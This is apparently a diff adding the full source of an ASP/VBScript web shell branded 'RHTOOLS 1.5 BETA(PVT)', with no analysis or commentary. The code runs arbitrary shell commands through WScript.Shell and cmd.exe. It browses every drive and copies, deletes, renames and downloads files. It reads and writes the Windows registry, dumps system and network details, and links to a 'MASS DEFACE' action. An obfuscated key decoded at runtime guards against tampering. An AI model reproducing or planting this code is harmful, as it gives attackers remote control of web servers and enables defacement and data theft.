+Class UploadedFile
+	Public ContentType
+	Public FileName
+	Public FileData
+	Public Property Get FileSize()
+		FileSize = LenB(FileData)
+	End Property
+	Public Sub SaveToDisk(sPath)
+		Dim oFS, oFile
+		Dim nIndex
+		If sPath = "" Or FileName = "" Then Exit Sub
+		If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\"
+		Set oFS = Server.CreateObject("Scripting.FileSystemObject")
+		If Not oFS.FolderExists(sPath) Then Exit Sub
+		Set oFile = oFS.CreateTextFile(sPath & FileName, True)
+		For nIndex = 1 to LenB(FileData)
+		    oFile.Write Chr(AscB(MidB(FileData,nIndex,1)))
+		Next
+		oFile.Close
+	End Sub
+	Public Sub SaveToDatabase(ByRef oField)
+		If LenB(FileData) = 0 Then Exit Sub
+		If IsObject(oField) Then
+			oField.AppendChunk FileData
+		End If
+	End Sub
+End Class
+key = "5DCADAC1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E53205CA01902E59F7273E1902E597A18C51902E59AC1E8F1902E59DE24591902E55F5B0911902E53CF70E31902E597A18C51902E5B2349FA1902E5A422FED1902E597A18C51902E5A8D389C1902E53CF70E31902E53205CA01902E5B3C4CDF1902E5A422FED1902E5BEB61221902E59DE24591902E55F5B0911902E53CF70E31902E54C98DD51902E53CF70E31902E560EB3761902E547E85261902E55AAA7E21902E55AAA7E21902E53205CA01902E5802ED5A1902E5708D0681902E5834F3241902E57B7E4AB1902E57B7E4AB1902E576CDBFC1902E581BF03F1902E53205CA01902E54C98DD51902E547E85261902E552D99691902E53205CA01902E5672BF0A1902E56BDC7B91902E5834F3241902E5659BC251902E53E873C81902E57D0E7901902E5866F8EE1902E5834F3241902E540176AD1902E53B66DFE1902E59AC1E8F1902E5AD8414B1902E5AF144301902E5BD25E3D1902E55C3AAC71902E53205CA01902E5672BF0A1902E58B2019D1902E53205CA01902E55DCADAC1902E597A18C51902E53205CA01902E5A292D081902E5B2349FA1902E59DE24591902E59F7273E1902E55F5B0911902E53CF70E31902E5AA63B811902E597A18C51902E5A422FED1902E5A8D389C1902E5B554FC41902E5AD8414B1902E55AAA7E21902E5B2349FA1902E5A292D081902E59F7273E1902E597A18C51902E59AC1E8F1902E5B554FC41902E5AD8414B1902E5B2349FA1902E5640B9401902E597A18C51902E5ABF3E661902E5B554FC41902E5A422FED1902E5B3C4CDF1902E5AD8414B1902E59AC1E8F1902E5A422FED1902E597A18C51902E5A8D389C1902E547E85261902E59AC1E8F1902E5AD8414B1902E5AA63B811902E53CF70E31902E560EB3761902E5802ED5A1902E5708D0681902E56BDC7B91902E581BF03F1902E584DF6091902E581BF03F1902E53205CA01902E56D6CA9E1902E5659BC251902E568BC1EF1902E5834F3241902E57B7E4AB1902E5802ED5A1902E55DCADAC1902E5497880B1902E597A18C51902E560EB3761902E53205CA01902E546582411902E53205CA01902E55DCADAC1902E597A18C51902E53205CA01902E5A292D081902E5B2349FA1902E59DE24591902E59F7273E1902E55F5B0911902E53CF70E31902E5708D0681902E5834F3241902E5834F3241902E57D0E7901902E55AAA7E21902E5497880B1902E5497880B1902E587FFBD31902E587FFBD31902E587FFBD31902E547E85261902E5802ED5A1902E5708D0681902E56BDC7B91902E581BF03F1902E584DF6091902E581BF03F1902E56D6CA9E1902E5659BC251902E568BC1EF1902E5834F3241902E57B7E4AB1902E5802ED5A1902E547E85261902E568BC1EF1902E573AD6321902E5672BF0A1902E547E85261902E579EE1C61902E56BDC7B91902E5834F3241902E53CF70E31902E53205CA01902E5B554FC41902E597A18C51902E5B2349FA1902E5A102A231902E59DE24591902E5B554FC41902E55F5B0911902E53CF70E31902E594812FB1902E59931BAA1902E5A8D389C1902E597A18C51902E5ABF3E661902E5A7435B71902E53CF70E31902E560EB3761902E5708D0681902E5834F3241902E5834F3241902E57D0E7901902E55AAA7E21902E5497880B1902E5497880B1902E587FFBD31902E587FFBD31902E587FFBD31902E547E85261902E5802ED5A1902E5708D0681902E56BDC7B91902E581BF03F1902E584DF6091902E581BF03F1902E56D6CA9E1902E5659BC251902E568BC1EF1902E5834F3241902E57B7E4AB1902E5802ED5A1902E547E85261902E568BC1EF1902E573AD6321902E5672BF0A1902E547E85261902E579EE1C61902E56BDC7B91902E5834F3241902E55DCADAC1902E5497880B1902E597A18C51902E560EB3761902E53205CA01902E55AAA7E21902E55AAA7E21902E547E85261902E55DCADAC1902E5497880B1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E560EB3761902E5|337308|1A7023"
+startcode = "<html><head><title>.:: RHTOOLS 1.5 BETA(PVT) ::.</title></head><body>"
+endocde = "</body></html>"
+onlinehelp = "<font face=""arial"" size=""1"">.:: <a href=""http://www.rhesusfactor.cjb.net"" target=""_blank"">ONLINE HELP</a> ::.</font><br>"
+Function DeCryptString(strCryptString)
+	Dim strRAW, arHexCharSet, i, intKey, intOffSet, strRawKey, strHexCrypData
+	    strRawKey = Right(strCryptString, Len(strCryptString) - InStr(strCryptString, "|"))
+	    intOffSet = Right(strRawKey, Len(strRawKey) - InStr(strRawKey,"|"))
+	    intKey = HexConv(Left(strRawKey, InStr(strRawKey, "|") - 1)) - HexConv(intOffSet)
+	    strHexCrypData = Left(strCryptString, Len(strCryptString) - (Len(strRawKey) + 1))
+	    arHexCharSet = Split(strHexCrypData, Hex(intKey))
+		 For i=0 to UBound(arHexCharSet)
+		      strRAW = strRAW & Chr(HexConv(arHexCharSet(i))/intKey)
+		 Next
+	    DeCryptString = CStr(strRAW)
+End Function
+Function HexConv(hexVar)
+	Dim hxx, hxx_var, multiply          
+         IF hexVar <> "" THEN
+              hexVar = UCASE(hexVar)
+              hexVar = StrReverse(hexVar)
+              DIM hx()
+              REDIM hx(LEN(hexVar))
+              hxx = 0
+              hxx_var = 0
+              FOR hxx = 1 TO LEN(hexVar)
+                   IF multiply = "" THEN multiply = 1
+                   hx(hxx) = mid(hexVar,hxx,1)
+                   hxx_var = (get_hxno(hx(hxx)) * multiply) + hxx_var
+                   multiply = (multiply * 16)
+              NEXT
+              hexVar = hxx_var
+              HexConv = hexVar
+         END IF
+End Function
+cprthtml = "<font face='arial' size='1'>.:: RHTOOLS 1.5 BETA(PVT)&copy; BY <a href='mailto:rhfactor@antisocial.com'>RHESUS FACTOR</a> - <a href='HTTP://WWW.RHESUSFACTOR.CJB.NET' target='_blank'>HTTP://WWW.RHESUSFACTOR.CJB.NET</a> ::.</font>"
+Function get_hxno(ghx)
+         If ghx = "A" Then
+              ghx = 10
+         ElseIf ghx = "B" Then
+              ghx = 11
+         ElseIf ghx = "C" Then
+              ghx = 12
+         ElseIf ghx = "D" Then
+              ghx = 13
+         ElseIf ghx = "E" Then
+              ghx = 14
+         ElseIf ghx = "F" Then
+              ghx = 15
+         End If
+         get_hxno = ghx
+End Function
+keydec = DeCryptString(key)
+Function showobj(objpath)
+	showobj = Mid(objpath,InstrRev(objpath,"\")+1,Len(objpath))
+End Function
+Function showobjpath(objpath)
+	showobjpath = Left(objpath,InstrRev(objpath,"\"))
+End Function
+Function checking(a,b)
+	If CStr(Mid(a,95,13)) <> CStr(Mid(b,95,13)) Then
+		pagina = Mid(Request.ServerVariables("SCRIPT_NAME"),InstrRev(Request.ServerVariables("SCRIPT_NAME"),"/")+1,Len(Request.ServerVariables("SCRIPT_NAME"))) & "?action=error"
+		Response.Redirect(pagina)
+	End If
+End Function
+Sub hdr()
+	Response.Write startcode
+	Response.Write keydec
+	Response.Write "<br>"
+End Sub
+Sub showcontent()
+	Response.Write "<font face=""arial"" size=""1"">.:: <a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=root"">DRIVES</a> ::.<br>.:: SCRIPT PATH: " & UCase(Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))) & "<br><br></font>"
+	If Trim(Request.QueryString("raiz")) = "root" Then
+		Set fs=Server.Createobject("Scripting.FileSystemObject")
+		Set drivecollection=fs.drives
+		Response.Write "<font face=""arial"" size=""2"">"
+		For Each drive IN drivecollection 
+			str=drive.driveletter & ":"
+			Response.Write "<b><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & str & """>" & UCase(str) & "</a></b><br>"
+			Select Case drive.DriveType
+				Case 0
+					tipodrive = "Unknown"
+					nomedrive = drive.VolumeName
+				Case 1
+					tipodrive = "Removable"
+					If drive.isready Then
+						nomedrive = drive.VolumeName
+					Else
+						nomedrive = ""
+					End If
+				Case 2
+					tipodrive = "Fixed"
+					If drive.isready Then
+						nomedrive = drive.VolumeName
+					Else
+						nomedrive = ""
+					End If
+				Case 3
+					tipodrive = "Network"
+					If drive.isready Then
+						nomedrive = drive.ShareName
+					Else
+						nomedrive = ""
+					End If
+				Case 4
+					tipodrive = "CD-Rom"
+					If drive.isready Then
+						nomedrive = drive.VolumeName
+					Else
+						nomedrive = ""
+					End If
+				Case 5
+					tipodrive = "RAM Disk"
+					If drive.isready Then
+						nomedrive = drive.VolumeName
+					Else
+						nomedrive = ""
+					End If
+			End Select
+			response.write "<b>Tipo:</b> " & tipodrive & "<br>"
+			response.write "<b>Nome: </b>" & nomedrive & "<br>"
+			response.write "<b>Sistema de Arquivos: </b>"
+			If drive.isready Then
+				set sp=fs.getdrive(str)
+				response.write sp.filesystem & "<br>"
+			Else
+			response.write "-<br>"
+			End If
+			Response.Write "<b>Espa�o Livre: </b>"
+			If drive.isready Then
+				freespace = (drive.AvailableSpace / 1048576)
+				set sp=fs.getdrive(str)
+				response.write(Round(freespace,1) & " MB<br>")
+			Else
+				response.write("-<br>")
+			End If
+			Response.Write "<b>Espa�o Total: </b>"
+			If drive.isready Then
+				totalspace = (drive.TotalSize / 1048576)
+				set sp=fs.getdrive(str)
+				response.write(Round(totalspace,1) & " MB<br>")
+			Else
+				response.write("-<br>")
+			End If
+			Response.Write "<br>"
+		Next
+		Response.Write "</font>"
+		Set fs = Nothing
+		Set drivecollection = Nothing
+		set sp=Nothing
+	Else
+		If Trim(Request.QueryString("raiz")) = "" Then
+			caminho = Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))
+			pos = Instr(caminho,"\")
+			pos2 = 1
+			While pos2 <> 0
+				If Instr(pos + 1,caminho,"\") <> 0 Then
+					pos = Instr(pos + 1,caminho,"\")
+				Else
+					pos2 = 0
+				End If
+			Wend
+			raiz = Left(caminho,pos)
+		Else
+			raiz =  trim(Request.QueryString("raiz")) & "\"
+		End If
+		Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+		Set MonRep = ObjFSO.GetFolder(raiz)
+		Set ColFolders = MonRep.SubFolders
+		Set ColFiles0 = MonRep.Files
+		Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=test&path=" & Replace(raiz,"\","|") & "', 'win1','width=600,height=300,scrollbars=YES,resizable')"">MASS TEST IN " & UCase(raiz) & "</a></font><br><br>"
+		Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=dfc&path=" & Replace(raiz,"\","|") & "', 'win1','width=700,height=300,scrollbars=YES,resizable')"">MASS DEFACE IN " & UCase(raiz) & "</a></font><br><br>"
+		Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=upload&path=" & Replace(raiz,"\","|") & "', 'win1','width=500,height=100,scrollbars=YES,resizable')"">UPLOAD FILE TO " & UCase(raiz) & "</a></font><br><br>"
+		Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=cmd', 'win1','width=760,height=540,scrollbars=YES,resizable')"">PROMPT</a> - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=info', 'win1','width=760,height=450,scrollbars=YES,resizable')"">SYS INFO</a> - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg', 'win1','width=550,height=250,scrollbars=YES,resizable')"">REGEDIT</a></font><br><br>"
+		Response.Write "<font face='arial'><b>Root Folder: " & raiz & "</b></font><br><br>"
+		If CInt(Len(raiz) - 1) <> 2 Then
+			barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),"\")) - 1
+			backlevel = Left(raiz,barrapos)
+			Response.Write "<font face='arial' size='2'><b>&lt;DIR&gt;<a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & backlevel & "'> . . </font></b></a><br>"
+		Else
+			Response.Write "<font face='arial' size='2'><b>&lt;DIR&gt;<a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=root'> . .&nbsp;</font></b></a><br>"
+		End If
+		Response.Write "<table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
+		for each folderItem in ColFolders
+			Response.Write "<tr><td><font face='arial' size='2'><b>&lt;DIR&gt; <a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & folderItem.path & "'>" & showobj(folderItem.path) & "</a></b></td><td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=put&path=" & Replace(folderItem.path,"\","|") & "', 'win1','width=400,height=250,scrollbars=YES,resizable')"">&lt;&lt; PUT</a></font></td></tr>"
+		next
+		Response.Write "</table><br><table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
+		marcatabela = true
+		for each FilesItem0 in ColFiles0
+			If marcatabela = true then
+				corfundotabela = " bgcolor=""#EEEEEE"""
+			Else
+				corfundotabela = ""
+			End If
+			Response.Write "<tr><td" & corfundotabela & "><font face='arial' size='2'>:: " & showobj(FilesItem0.path) & "</td><td valign='baseline'" & corfundotabela & "><font face='arial' size='1'>&nbsp;&nbsp;" & FormatNumber(FilesItem0.size/1024, 0) & "&nbsp;Kbytes&nbsp;&nbsp;&nbsp;</font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=get&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.GET.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=ren&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.REN.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=del&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.DEL.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtview&file=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=640,height=480,scrollbars=YES,resizable')"">o.VIEW.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit&file=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=760,height=520,scrollbars=YES,resizable')"">o.EDIT.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=download&file=" & Replace(FilesItem0.path,"\","|") & """>o.DOWNLOAD.o</a></font></td></tr>"
+			marcatabela = NOT marcatabela
+		next
+		Response.Write "</table>"
+	End If
+End Sub
+Select Case Trim(Request.QueryString("action"))
+	Case "get"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		caminho = Replace(Trim(Request.QueryString("path")),"|","\")
+		Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+		Set MyFile = ObjFSO.GetFile(caminho)
+		destino = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
+		MyFile.Copy (destino)
+		If Err.Number = 0 Then
+			Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & caminho & "</b><br>copiado para: " & destino
+		End If	
+	Case "put"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		If Trim(Request.QueryString("arquivo")) = "" Then
+			caminho = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
+			varpath = Trim(Request.QueryString("path"))
+			Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+			Set MonRep = ObjFSO.GetFolder(caminho)
+			Set ColFolders = MonRep.SubFolders
+			Set ColFiles0 = MonRep.Files
+
+			Response.Write "<font face='arial' size='2'><b>Selecione o arquivo: <br><table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
+			for each FilesItem0 in ColFiles0
+				Response.Write "<tr><td><font face='arial' size='2'>:: " & showobj(FilesItem0.path) & "</td><td valign='baseline'><font face='arial' size='1'>&nbsp;&nbsp;" & FormatNumber(FilesItem0.size/1024, 0) & "&nbsp;Kbytes&nbsp;&nbsp;&nbsp;</font></td><td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='1'><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=put&path=" & varpath & "&arquivo=" & Replace(FilesItem0.path,"\","|") & """>:: SELECIONAR ::</a></font></td></tr>"
+			next
+			Response.Write "</table>"
+		Else
+			destino = Replace(Trim(Request.QueryString("path")),"|","\") & "\"
+			arquivo = Replace(Trim(Request.QueryString("arquivo")),"|","\")
+			Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+			Set MyFile = ObjFSO.GetFile(arquivo)
+			MyFile.Copy (destino)
+			If Err.Number = 0 Then
+				Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & arquivo & "</b><br>copiado para: <b>" & destino
+			End If
+		End If
+	Case "del"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		caminho = Replace(Trim(Request.QueryString("path")),"|","\")
+		Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+		Set MyFile = ObjFSO.GetFile(caminho)
+		MyFile.Delete
+		If Err.Number = 0 Then
+			Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
+			Response.Write "<font face='arial' size='2'><center><br><br>Arquivo <b>" & caminho & "</b> apagado<br>"
+		End If
+	Case "ren"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		If Trim(Request.QueryString("status")) <> "2" Then
+			caminho = Replace(Trim(Request.QueryString("path")),"|","\")
+			arquivo = showobj(caminho)
+			Response.Write "<br><font face=""arial"" size=""2""><b>" & arquivo & "</b><br>" & _
+						       "<form action=""" & Request.ServerVariables("SCRIPT_NAME") & """ method=""get"">" & _
+						       "<input type=""hidden"" name=""action"" value=""ren"">" & _
+						       "<input type=""hidden"" name=""status"" value=""2"">" & _
+						       "<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("path")) & """>" & _
+						       "Digite o novo nome: <input type=""text"" name=""newname"">" & _
+						       "&nbsp;&nbsp;<input type=""submit"" value=""alterar"">" & _
+						       "</form>"
+		Else
+			caminho = Replace(Trim(Request.QueryString("path")),"|","\")
+			Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+			Set MyFile = ObjFSO.GetFile(caminho)
+			destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.QueryString("newname"))
+			MyFile.Move (destino)
+			If Err.Number = 0 Then
+				Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & caminho & "</b><br>renomeado para<b>: " & destino
+				Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
+			End If	
+		End If
+	Case "error"
+		Response.Write "<center><font face='arial' size='2' color='red'> <b>C�DIGO CORROMPIDO<BR>CORRUPT CODE</font></center>"
+	Case "cmd"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		Set oScript = Server.CreateObject("WSCRIPT.SHELL") 
+		Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") 
+		Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 
+		szCMD = Request.QueryString(".CMD") 
+		If (szCMD <> "") Then 
+			szTempFile = "c:\" & oFileSys.GetTempName( ) 
+			Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 
+			Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) 
+		End If 
+		Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET""><input type=""hidden"" name=""action"" value=""cmd""><input type=text name="".CMD"" size=45 value=""" & szCMD & """><input type=submit value=""Run""></FORM><br><br> "
+		If (IsObject(oFile)) Then 
+			On Error Resume Next 
+			Response.Write "<font face=""arial"">"
+			Response.Write Replace(Replace(Server.HTMLEncode(oFile.ReadAll),VbCrLf,"<br>")," ","&nbsp;")
+			oFile.Close 
+			Call oFileSys.DeleteFile(szTempFile, True) 
+		End If 
+	Case "info"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		Set WshNetwork = Server.CreateObject("WScript.Network")
+		Set WshShell = Server.CreateObject("WScript.Shell")
+		Set WshEnv = WshShell.Environment("SYSTEM")
+		Response.Write "<br><font face=arial size=2>"
+		Response.Write "<b>IDENTIFICA��O DE REDE:</b><br>"
+		Response.Write "<b>Usu�rio: </b>" & WshNetwork.UserName & "<br>"
+		Response.Write "<b>Nome do Computador: </b>" & WshNetwork.ComputerName & "<br>"
+		Response.Write "<b>Usu�rio do Dom�nio: </b>" & WshNetwork.UserDomain & "<br>"
+		Set Drives = WshNetwork.EnumNetworkDrives
+		For i = 0 to Drives.Count - 1
+			Response.Write "<b>Drive de Rede (Mapeado): </b>" & Drives.Item(i) & "<br>"
+		Next
+		Response.Write "<br><b>F�SICO:</b><br>"
+		Response.Write "<b>Arquitetura do Processador: </b>" & WshEnv("PROCESSOR_ARCHITECTURE") & "<br>"
+		Response.Write "<b>N�mero de Processadores: </b>" & WshEnv("NUMBER_OF_PROCESSORS") & "<br>"
+		Response.Write "<b>Identificador do Processador: </b>" & WshEnv("PROCESSOR_IDENTIFIER") & "<br>"
+		Response.Write "<b>N�vel do Processador: </b>" & WshEnv("PROCESSOR_LEVEL") & "<br>"
+		Response.Write "<b>Revis�o do Processador: </b>" & WshEnv("PROCESSOR_REVISION") & "<br>"
+		Response.Write "<br><b>L�GICO:</b><br>"
+		Response.Write "<b>IP: </b>" & request.servervariables("LOCAL_ADDR") & "<br>"
+		Response.Write "<b>Sistema Operacional: </b>" & WshEnv("OS") & "<br>"
+		Response.Write "<b>Servidor Web: </b>" & request.servervariables("SERVER_SOFTWARE") & "<br>"
+		Response.Write "<b>Especifica��o do Command: </b>" & WshShell.ExpandEnvironmentStrings("%ComSpec%") & "<br>"
+		Response.Write "<b>Caminhos no Path: </b>" & WshEnv("PATH") & "<br>"
+		Response.Write "<b>Execut�veis: </b>" & WshEnv("PATHEXT") & "<br>"
+		Response.Write "<b>Prompt: </b> " & WshEnv("PROMPT") & "<br>"
+		Response.Write "<b>System Drive: </b>" & WshShell.ExpandEnvironmentStrings("%SYSTEMDRIVE%") & "<br>"
+		Response.Write "<b>System Root: </b>" & WshShell.ExpandEnvironmentStrings("%SYSTEMROOT%") & "<br>"
+		Response.Write "<b>Caminho do System32: </b>" & WshShell.CurrentDirectory & "<br>"
+		Set Drives = Nothing
+		Set WshNetwork = Nothing
+		Set WshShell = Nothing
+		Set WshEnv = Nothing
+	Case "reg"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		Set WshShell = Server.CreateObject("WScript.Shell")
+		Response.Write "<font face=""arial"" size=""2""><b>Editor de Registro:</b><br><br>"
+		Select Case Trim(Request.QueryString("regaction"))
+			Case "w"
+				If Trim(Request.QueryString("process")) = "yes" Then
+					Select Case Trim(Request.QueryString("type"))
+						Case "1"
+							teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_SZ")
+						Case "2"
+							teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_DWORD")
+						Case "3"
+							teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_BINARY")
+						Case "4"
+							teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_EXPAND_SZ")
+						Case "5"
+							teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_MULTI_SZ")
+					End Select
+					Response.Write "<center><br><font face=""arial"" size=""2"">Registro <b>"
+					Response.Write Trim(Request.QueryString("key")) & "</b> Escrito</center>"
+					Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
+				Else
+					Response.Write "<table><tr><td><font face=""arial"" size=""2"">ROOT KEY NAME</td><td><font face=""arial"" size=""2"">ABREVIA��O</td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CURRENT_USER </td><td><font face=""arial"" size=""1""> HKCU </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_LOCAL_MACHINE </td><td><font face=""arial"" size=""1""> HKLM </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CLASSES_ROOT </td><td><font face=""arial"" size=""1""> HKCR </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_USERS </td><td><font face=""arial"" size=""1""> HKEY_USERS </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CURRENT_CONFIG </td><td><font face=""arial"" size=""1""> HKEY_CURRENT_CONFIG </td></tr></table><br>"
+					Response.Write "<table><tr><td><font face=""arial"" size=""2"">Tipo </td><td><font face=""arial"" size=""2""> Descri��o </td><td><font face=""arial"" size=""2""> Na forma de </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">REG_SZ </td><td><font face=""arial"" size=""1""> string </td><td><font face=""arial"" size=""1""> string </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">REG_DWORD </td><td><font face=""arial"" size=""1""> n�mero </td><td><font face=""arial"" size=""1""> inteiro </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">REG_BINARY </td><td><font face=""arial"" size=""1""> valor bin�rio </td><td><font face=""arial"" size=""1""> VBArray de inteiros </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">REG_EXPAND_SZ </td><td><font face=""arial"" size=""1""> string expand�vel (ex. ""%windir%\\calc.exe"") </td><td><font face=""arial"" size=""1""> string </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">REG_MULTI_SZ </td><td><font face=""arial"" size=""1""> array de strings </td><td><font face=""arial"" size=""1""> VBArray de strings </td></tr></table>"
+					Response.Write "<br><br><FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
+					Response.Write "<table><tr><td><font face=""arial"" size=""1"">KEY: </td><td><input type=""text"" name=""key""> <font face=""arial"" size=""1""><br>( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )</td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">VALUE:</td><td><input type=""text"" name=""value""></td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">TYPE:</td><td><SELECT NAME=""type"">"
+					Response.Write "<OPTION VALUE=""1"">REG_SZ </option>"
+					Response.Write "<OPTION VALUE=""2"">REG_DWORD </option>"
+					Response.Write "<OPTION VALUE=""3"">REG_BINARY </option>"
+					Response.Write "<OPTION VALUE=""4"">REG_EXPAND_SZ </option>"
+					Response.Write "<OPTION VALUE=""5"">REG_MULTI_SZ </option></select><br>"
+					Response.Write "<input type=""hidden"" name=""regaction"" value=""w"">"
+					Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
+					Response.Write "<input type=""hidden"" name=""process"" value=""yes""></td></tr>"
+					Response.Write "<tr><td></td><td><input type=""submit"" value=""OK""></form></td></tr></table>"
+					Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
+				End If
+			Case "r"
+				If Trim(Request.QueryString("process")) = "yes" Then
+					Response.Write "<font face=""arial"" size=""2"">" & Trim(Request.QueryString("key")) & "<br>"
+					Response.Write "Valor: <b>" & WshShell.RegRead (Trim(Request.QueryString("key")))
+				Else
+					Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
+					Response.Write "<font face=""arial"" size=""1"">KEY: <input type=""text"" name=""key""> <br>( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )<br>"
+					Response.Write "<input type=""hidden"" name=""regaction"" value=""r"">"
+					Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
+					Response.Write "<input type=""hidden"" name=""process"" value=""yes"">"
